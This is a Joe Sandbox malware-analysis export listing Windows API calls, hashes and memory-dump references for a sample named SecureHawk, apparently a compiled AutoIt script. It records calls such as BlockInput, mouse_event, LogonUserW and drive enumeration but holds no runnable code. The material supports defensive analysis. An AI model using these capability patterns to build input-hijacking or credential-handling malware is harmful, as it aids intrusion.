                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: AdjustCloseHandlePrivilegesToken
                                  • String ID:
                                  • API String ID: 81990902-0
                                  • Opcode ID: 774ed4bb3beb8838ffe508ebe1294b961cd7726432f24ad4f3fa7c1e3d3cd865
                                  • Instruction ID: 3d59097cccd10261896055a91c7056598234519750b985fd14b27078d8521f96
                                  • Opcode Fuzzy Hash: 774ed4bb3beb8838ffe508ebe1294b961cd7726432f24ad4f3fa7c1e3d3cd865
                                  • Instruction Fuzzy Hash: 7FE04F71004600AFE76B2B60EC05EB77BADEF04311B10851AB55584430CB716CD1DB50
                                  APIs
                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,0000FFFF,00318EB7,0000FCD7,?,?,00000001), ref: 0031A2BA
                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0031A2C3
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled
                                  • String ID:
                                  • API String ID: 3192549508-0
                                  • Opcode ID: 3c93ea210457085af6e2fc84662677074f329e91994c7f6eb024bc2b10d2fdb7
                                  • Instruction ID: 64c9af352fee89bbd7d24eb304b7058ae4323150f6b60be414f9b3e1c5f3a14c
                                  • Opcode Fuzzy Hash: 3c93ea210457085af6e2fc84662677074f329e91994c7f6eb024bc2b10d2fdb7
                                  • Instruction Fuzzy Hash: 8EB09235064308ABCA862B91EC09B883F6CEB46B62F004090F64D44060CBA254548B91
                                  APIs
                                  • BlockInput.USER32(00000001), ref: 003643D4
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: BlockInput
                                  • String ID:
                                  • API String ID: 3456056419-0
                                  • Opcode ID: bc37c539d5c4198042ee603d6041442574466d3f00befc2e43b1f42f672f6657
                                  • Instruction ID: d590dd27883f40632ac4edafacf7d93c0e9c4baa8381118cf40692dd7bcb782c
                                  • Opcode Fuzzy Hash: bc37c539d5c4198042ee603d6041442574466d3f00befc2e43b1f42f672f6657
                                  • Instruction Fuzzy Hash: 2AE0D8352102045FC300AF59E400997F7DCEF543A0F00C025FE05D7311DAB0EC208B90
                                  APIs
                                  • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 0035509E
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: mouse_event
                                  • String ID:
                                  • API String ID: 2434400541-0
                                  • Opcode ID: 8d0f7735c8064062560a27a0965129137f8fab97cddbb87649c6c7de510d58b5
                                  • Instruction ID: e5bf602456de323c2d4bedbc514ffdcc6e35e40f60c3b1d6275c49c8104e3f24
                                  • Opcode Fuzzy Hash: 8d0f7735c8064062560a27a0965129137f8fab97cddbb87649c6c7de510d58b5
                                  • Instruction Fuzzy Hash: DBD017A0120B0468E87A0730982BF761138A3407D3F9501893A058B0E49A90B848A070
                                  APIs
                                  • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00348D8A), ref: 0034916C
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: LogonUser
                                  • String ID:
                                  • API String ID: 1244722697-0
                                  • Opcode ID: 2d15b91cdaf823b7dbe527195af4bcfe1bf21d37002e39b107f1a39594038aee
                                  • Instruction ID: 18ad0e568243a1fd8e9831664617fbfc32f6b3cdf377f50ac5bac22c16abcab5
                                  • Opcode Fuzzy Hash: 2d15b91cdaf823b7dbe527195af4bcfe1bf21d37002e39b107f1a39594038aee
                                  • Instruction Fuzzy Hash: 24D05E7326060EABEF018EA4DC01EAE3B69EB04B01F408111FE15D50A0C775D835AB60
                                  APIs
                                  • GetUserNameW.ADVAPI32(?,?), ref: 00330664
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: NameUser
                                  • String ID:
                                  • API String ID: 2645101109-0
                                  • Opcode ID: 1eb2fa0f13fc3909f9af1ab463f7f6dfb03f8374a6c226ac0a32ec829653375a
                                  • Instruction ID: d6ed30d4750cf8f56b43c684b9d3cebeb83e82ea3554d8c618d03882d2ac06c1
                                  • Opcode Fuzzy Hash: 1eb2fa0f13fc3909f9af1ab463f7f6dfb03f8374a6c226ac0a32ec829653375a
                                  • Instruction Fuzzy Hash: CEC04CF180011DDBCB06DB90DA88DEE77BCAB04304F100066A101F2100D7749B448B71
                                  APIs
                                  • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0031A28A
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: ExceptionFilterUnhandled
                                  • String ID:
                                  • API String ID: 3192549508-0
                                  • Opcode ID: 873122da9b7302908ddc5211bffbaac3b60ac692ffe97389813668389c309cfa
                                  • Instruction ID: 52c7a11282cf30aae1d4fa2632e438017d4d70d99e33aeeb5c0389802e8d3695
                                  • Opcode Fuzzy Hash: 873122da9b7302908ddc5211bffbaac3b60ac692ffe97389813668389c309cfa
                                  • Instruction Fuzzy Hash: 3CA0113002020CAB8A022B82EC08888BFACEA022A0B0080A0F80C000228BB2A8208A80
                                  APIs
                                  • DeleteObject.GDI32(00000000), ref: 00367D0D
                                  • DeleteObject.GDI32(00000000), ref: 00367D1F
                                  • DestroyWindow.USER32 ref: 00367D2D
                                  • GetDesktopWindow.USER32 ref: 00367D47
                                  • GetWindowRect.USER32(00000000), ref: 00367D4E
                                  • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00367E8F
                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00367E9F
                                  • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00367EE7
                                  • GetClientRect.USER32(00000000,?), ref: 00367EF3
                                  • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00367F2D
                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00367F4F
                                  • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00367F62
                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00367F6D
                                  • GlobalLock.KERNEL32(00000000), ref: 00367F76
                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00367F85
                                  • GlobalUnlock.KERNEL32(00000000), ref: 00367F8E
                                  • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00367F95
                                  • GlobalFree.KERNEL32(00000000), ref: 00367FA0
                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00367FB2
                                  • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00383C7C,00000000), ref: 00367FC8
                                  • GlobalFree.KERNEL32(00000000), ref: 00367FD8
                                  • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00367FFE
                                  • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0036801D
                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0036803F
                                  • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0036822C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                  • String ID: $AutoIt v3$DISPLAY$static
                                  • API String ID: 2211948467-2373415609
                                  • Opcode ID: e74567c41a50068e72910804533d9de9f37bfbfe870efa194a59fad6b51105c4
                                  • Instruction ID: 3a19eb518f5d56d902ba244f89312055119a3d37a33983b3f32386b32e62ba32
                                  • Opcode Fuzzy Hash: e74567c41a50068e72910804533d9de9f37bfbfe870efa194a59fad6b51105c4
                                  • Instruction Fuzzy Hash: 5E027E71900219EFDB15DF64CC89EAEBBB9EF48314F008558FA15AB2A1DB74AD05CF60
                                  APIs
                                  • CharUpperBuffW.USER32(?,?,00380980), ref: 00373A2D
                                  • IsWindowVisible.USER32(?), ref: 00373A51
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: BuffCharUpperVisibleWindow
                                  • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                  • API String ID: 4105515805-45149045
                                  • Opcode ID: 0eed2952454962fd12c6d466cfa69a13f99220db6ca80c3d304369692cf48701
                                  • Instruction ID: 00d9c891c4ec34fb7e12bc1c26e53a85c632429cd633a3e2ca8537d179e47ce8
                                  • Opcode Fuzzy Hash: 0eed2952454962fd12c6d466cfa69a13f99220db6ca80c3d304369692cf48701
                                  • Instruction Fuzzy Hash: 77D1C9312042018BC72AEF10C451ABAB7A5EF85344F548558F89A5F6E3CB75EE4ADF81
                                  APIs
                                  • SetTextColor.GDI32(?,00000000), ref: 0037AA1D
                                  • GetSysColorBrush.USER32(0000000F), ref: 0037AA4E
                                  • GetSysColor.USER32(0000000F), ref: 0037AA5A
                                  • SetBkColor.GDI32(?,000000FF), ref: 0037AA74
                                  • SelectObject.GDI32(?,00000000), ref: 0037AA83
                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 0037AAAE
                                  • GetSysColor.USER32(00000010), ref: 0037AAB6
                                  • CreateSolidBrush.GDI32(00000000), ref: 0037AABD
                                  • FrameRect.USER32(?,?,00000000), ref: 0037AACC
                                  • DeleteObject.GDI32(00000000), ref: 0037AAD3
                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 0037AB1E
                                  • FillRect.USER32(?,?,00000000), ref: 0037AB50
                                  • GetWindowLongW.USER32(?,000000F0), ref: 0037AB7B
                                    • Part of subcall function 0037ACB7: GetSysColor.USER32(00000012), ref: 0037ACF0
                                    • Part of subcall function 0037ACB7: SetTextColor.GDI32(?,?), ref: 0037ACF4
                                    • Part of subcall function 0037ACB7: GetSysColorBrush.USER32(0000000F), ref: 0037AD0A
                                    • Part of subcall function 0037ACB7: GetSysColor.USER32(0000000F), ref: 0037AD15
                                    • Part of subcall function 0037ACB7: GetSysColor.USER32(00000011), ref: 0037AD32
                                    • Part of subcall function 0037ACB7: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0037AD40
                                    • Part of subcall function 0037ACB7: SelectObject.GDI32(?,00000000), ref: 0037AD51
                                    • Part of subcall function 0037ACB7: SetBkColor.GDI32(?,00000000), ref: 0037AD5A
                                    • Part of subcall function 0037ACB7: SelectObject.GDI32(?,?), ref: 0037AD67
                                    • Part of subcall function 0037ACB7: InflateRect.USER32(?,000000FF,000000FF), ref: 0037AD86
                                    • Part of subcall function 0037ACB7: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0037AD9D
                                    • Part of subcall function 0037ACB7: GetWindowLongW.USER32(00000000,000000F0), ref: 0037ADB2
                                    • Part of subcall function 0037ACB7: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0037ADDA
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                  • String ID:
                                  • API String ID: 3521893082-0
                                  • Opcode ID: dbfcfcad0172a6216d21aa7a7900fe703bad9f188590cf07329dd930a827a7de
                                  • Instruction ID: 01351c18530c3d4fa37aafb5a867b0bc918272d9d82b55a781f382b9f56396c6
                                  • Opcode Fuzzy Hash: dbfcfcad0172a6216d21aa7a7900fe703bad9f188590cf07329dd930a827a7de
                                  • Instruction Fuzzy Hash: FA919C72008701AFCBA69F64DC08E6F7BADFF89321F104A19F966961A0D774D948CF52
                                  APIs
                                  • DestroyWindow.USER32(?,?,?), ref: 002F3072
                                  • DeleteObject.GDI32(00000000), ref: 002F30B8
                                  • DeleteObject.GDI32(00000000), ref: 002F30C3
                                  • DestroyIcon.USER32(00000000,?,?,?), ref: 002F30CE
                                  • DestroyWindow.USER32(00000000,?,?,?), ref: 002F30D9
                                  • SendMessageW.USER32(?,00001308,?,00000000), ref: 0032C6AC
                                  • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0032C6E5
                                  • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0032CB0E
                                    • Part of subcall function 002F1F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,002F2412,?,00000000,?,?,?,?,002F1AA7,00000000,?), ref: 002F1F76
                                  • SendMessageW.USER32(?,00001053), ref: 0032CB4B
                                  • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0032CB62
                                  • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0032CB78
                                  • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0032CB83
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                  • String ID: 0
                                  • API String ID: 464785882-4108050209
                                  • Opcode ID: 70dd9d61dba9954b38fb5a3d57a8d0c05a5a19437d5108038c42b046dc76c2c5
                                  • Instruction ID: 59e94a1878460c685b0b55dca464048c9601704cca9ebade8d6a7d056e8f9de6
                                  • Opcode Fuzzy Hash: 70dd9d61dba9954b38fb5a3d57a8d0c05a5a19437d5108038c42b046dc76c2c5
                                  • Instruction Fuzzy Hash: C612BD30620215EFCB26CF28D884BA9BBA5BF08340F15557AF595CB262CB31ED55CF91
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
                                  • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                  • API String ID: 2660009612-1645009161
                                  • Opcode ID: aa7ce2a05d04243ee53d4117c01e72204e86e7c9dd4a3116f6c78c56b3e0a46b
                                  • Instruction ID: aac507e5045a552865743544497e28ef8a744cc3bb5c5382c3ba7b42a59828cb
                                  • Opcode Fuzzy Hash: aa7ce2a05d04243ee53d4117c01e72204e86e7c9dd4a3116f6c78c56b3e0a46b
                                  • Instruction Fuzzy Hash: F7A18F71A45209BBCB17AF60CCA6FBF77B8AF49700F144069F8056B2D2EB709A51D750
                                  APIs
                                  • DestroyWindow.USER32(00000000), ref: 0036798D
                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00367A4C
                                  • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00367A8A
                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00367A9C
                                  • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00367AE2
                                  • GetClientRect.USER32(00000000,?), ref: 00367AEE
                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00367B32
                                  • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00367B41
                                  • GetStockObject.GDI32(00000011), ref: 00367B51
                                  • SelectObject.GDI32(00000000,00000000), ref: 00367B55
                                  • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00367B65
                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00367B6E
                                  • DeleteDC.GDI32(00000000), ref: 00367B77
                                  • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00367BA3
                                  • SendMessageW.USER32(00000030,00000000,00000001), ref: 00367BBA
                                  • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00367BF5
                                  • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00367C09
                                  • SendMessageW.USER32(00000404,00000001,00000000), ref: 00367C1A
                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00367C4A
                                  • GetStockObject.GDI32(00000011), ref: 00367C55
                                  • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00367C60
                                  • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00367C6A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                  • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                  • API String ID: 2910397461-517079104
                                  • Opcode ID: af89be582b818b28e8d9bc587be52523a8d5cc2994145f1d7c862f152e9bc266
                                  • Instruction ID: caac86c7a2c9ce8bce2acbf43d4bb889d32c732f18407bd972f9514ef7bca158
                                  • Opcode Fuzzy Hash: af89be582b818b28e8d9bc587be52523a8d5cc2994145f1d7c862f152e9bc266
                                  • Instruction Fuzzy Hash: FCA18171A40219BFEB15DBA4DC4AFAE7BADEB44714F008654FA15AB2E1C774AD00CB60
                                  APIs
                                  • SetErrorMode.KERNEL32(00000001), ref: 0035B1CE
                                  • GetDriveTypeW.KERNEL32(?,00382C4C,?,\\.\,00380980), ref: 0035B2AB
                                  • SetErrorMode.KERNEL32(00000000,00382C4C,?,\\.\,00380980), ref: 0035B409
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.3983023575.00000000002F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 002F0000, based on PE: true
                                  • Associated: 00000011.00000002.3982980735.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983148572.00000000003A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983254549.00000000003AF000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000011.00000002.3983285511.00000000003B8000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_17_2_2f0000_SecureHawk.jbxd
                                  Similarity
                                  • API ID: ErrorMode$DriveType
                                  • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                  • API String ID: 2907320926-4222207086
                                  • Opcode ID: 2aac8488c228bf57b80f968014b1720a0963120850fc225cf5cedb7920c0a0e6
                                  • Instruction ID: cadaafffe114a1ee015be62b5c1182029914730161ad70690b17851547dcb624
                                  • Opcode Fuzzy Hash: 2aac8488c228bf57b80f968014b1720a0963120850fc225cf5cedb7920c0a0e6
                                  • Instruction Fuzzy Hash: F251C174640209AFCB07EB14D9A3EBDF3A5EB05382B214457EC06BBAB0D7B09D59CB51
                                  APIs
                                  • GetSysColor.USER32(00000012), ref: 0037ACF0
                                  • SetTextColor.GDI32(?,?), ref: 0037ACF4
                                  • GetSysColorBrush.USER32(0000000F), ref: 0037AD0A
                                  • GetSysColor.USER32(0000000F), ref: 0037AD15
                                  • CreateSolidBrush.GDI32(?), ref: 0037AD1A
                                  • GetSysColor.USER32(00000011), ref: 0037AD32
                                  • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0037AD40
                                  • SelectObject.GDI32(?,00000000), ref: 0037AD51
                                  • SetBkColor.GDI32(?,00000000), ref: 0037AD5A
                                  • SelectObject.GDI32(?,?), ref: 0037AD67
                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 0037AD86
